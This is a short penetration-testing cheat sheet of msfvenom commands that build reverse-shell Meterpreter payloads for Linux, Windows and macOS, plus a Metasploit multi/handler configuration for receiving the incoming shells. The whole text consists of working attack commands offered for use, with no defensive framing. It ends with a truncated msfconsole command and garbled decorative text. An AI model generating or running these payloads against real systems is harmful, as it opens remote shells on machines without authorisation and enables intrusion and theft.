Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>


Handlers

Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z

Once the required values are completed, the following command will execute your handler: 'msfconsole -L -r '


โœ…git sources
โ– โ–‚ โ–„ U๐•Ÿ๐”ปโ’บ๐ซฤ†๐”ฌ๐““โ“” โ–„ โ–‚ โ–